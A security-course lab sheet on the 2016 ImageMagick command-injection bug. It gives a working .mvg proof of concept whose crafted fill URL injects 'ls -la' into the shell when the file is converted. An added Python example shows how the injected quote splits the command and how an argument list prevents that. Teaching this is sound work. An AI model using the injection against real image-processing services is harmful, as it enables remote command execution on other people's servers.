Exploiting ImageMagick


Proj X19: Exploiting ImageMagick (Up to 30 pts.)

Purpose

This is a very simple exploit that was made public on May 4, 2016. It's a code injection vulnerability, caused by software that takes user input and uses it to construct a command line.

What You Need

  • A Kali 2 machine, real or virtual

Task 1: Proof of Concept (5 pts.)

Checking ImageMagick Version

This bug has been patched, so if you have recently updated, your version may not be vulnerable. To check your version, in a Kali Terminal window, execute this command:
convert -version
When I did it, my version was "ImageMagick 6.8.9-9", as shown below. This version is vulnerable. If you see a different version number, check the Sources at the bottom of this project to see if it's vulnerable.

Creating the Exploit File

In a Kali Terminal window, execute this command:
nano exploit.mvg
In nano, enter the code shown below. Notice the mismatched single-quotes and double-quotes and the https URL that won't resolve. The vulnerability is in the https processor, and the payload of this exploit is the "ls -la" at the end.
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com"|ls "-la)'
pop graphic-context

Press Ctrl+X, Y, Enter to save the file. In a Kali Terminal window, execute this command:

convert exploit.mvg out.png
The "ls -la" command executes, listing the files in your working directory, as shown below.
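
Why the mismatched quotes matter, shown as an added example that is not part of the original project: the Python below pastes the fill URL from exploit.mvg into a command string and tokenises it the way a POSIX shell would, without executing anything, then builds the same call as an argument list. The template is an assumed stand-in for a delegate command line, and all function names are hypothetical.

```python
import re
import shlex

# Assumed stand-in for a delegate command template: %o is the output file,
# %M is the text that followed "https:" in the image file.
TEMPLATE = 'curl -s -k -o "%o" "https:%M"'
# The fill line from exploit.mvg on this page.
FILL_LINE = "fill 'url(https://example.com\"|ls \"-la)'"
SEPARATORS = {"|", "||", "&", "&&", ";"}
SHELL_META = set("\"'`|;&$<>\\\n")

def url_rest(line):
    """Return the text after 'https:' inside url(...), or None if absent."""
    m = re.search(r"url\(https:(.*)\)", line)
    return m.group(1) if m else None

def shell_string(rest, out="out.tmp"):
    """Weak pattern: untrusted text pasted into a string a shell will parse."""
    return TEMPLATE.replace("%o", out).replace("%M", rest)

def argv_list(rest, out="out.tmp"):
    """Hardened pattern: one list element per argument, run without a shell."""
    return ["curl", "-s", "-k", "-o", out, "https:" + rest]

def shell_stages(cmdline):
    """Tokenise like a POSIX shell and return one argv per command.
    Nothing is executed; this only shows how the line would be split."""
    lex = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    stages = [[]]
    for tok in lex:
        if tok in SEPARATORS:
            stages.append([])
        else:
            stages[-1].append(tok)
    return stages

def has_shell_meta(rest):
    """Pre-check a caller can apply before any URL reaches a command builder."""
    return any(c in SHELL_META for c in rest)

if __name__ == "__main__":
    rest = url_rest(FILL_LINE)
    print("shell sees :", shell_stages(shell_string(rest)))
    print("argv sees  :", argv_list(rest))
    print("reject?    :", has_shell_meta(rest))
```

The double quote in the URL closes the template's own quoting, so the shell parses two commands, while the argument list keeps the whole URL as a single argument.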

Saving the Screen Image

Make sure you can see these two required items, as shown in the image above:
  • convert command followed by a filename ending in .mvg
  • A file listing showing the same filename ending in .mvg with a Date
Save a whole-desktop image, using a filename of "Proj X19a from YOUR NAME".